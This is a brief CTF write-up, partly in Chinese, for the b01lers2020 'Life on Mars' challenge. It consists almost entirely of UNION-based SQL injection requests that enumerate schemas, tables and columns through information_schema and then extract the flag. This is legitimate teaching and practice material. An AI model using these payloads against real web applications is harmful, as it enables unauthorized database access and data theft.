[b01lers2020]Life on Mars
/query?search=hesperia_planum union select database(),group_concat(schema_name) from information_schema.schemata
得到库名:aliens、alien_code
/query?search=hesperia_planum union select database(),group_concat(table_name) from information_schema.tables where table_schema="alien_code"
得到表名:code
/query?search=hesperia_planum union select database(),group_concat(column_name) from information_schema.columns where table_name="code"
得到列名:id、code
/query?search=hesperia_planum union select database(),group_concat(id,code) from alien_code.code
得到flag:flag{1e914cc9-8b32-49b8-b4f0-23dd94d3bc64}
emm,非常简单的一道注入题;就是可能注入点有些难找;